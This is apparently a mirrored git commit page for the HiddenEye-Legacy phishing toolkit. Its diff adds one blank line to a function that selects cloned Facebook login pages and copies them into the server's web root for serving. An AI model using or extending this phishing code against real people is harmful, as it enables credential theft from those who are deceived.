mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge branch 'HEAD' into dev
This commit is contained in:
commit
0cab51983c
|
@ -258,6 +258,7 @@ def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
if custom_option == '1' and page == 'Facebook':
|
if custom_option == '1' and page == 'Facebook':
|
||||||
webpage_set("WebPages/fb_standard/", "Server/www/")
|
webpage_set("WebPages/fb_standard/", "Server/www/")
|
||||||
elif custom_option == '2' and page == 'Facebook':
|
elif custom_option == '2' and page == 'Facebook':
|
||||||
|
|
Loading…
Reference in New Issue
Block a user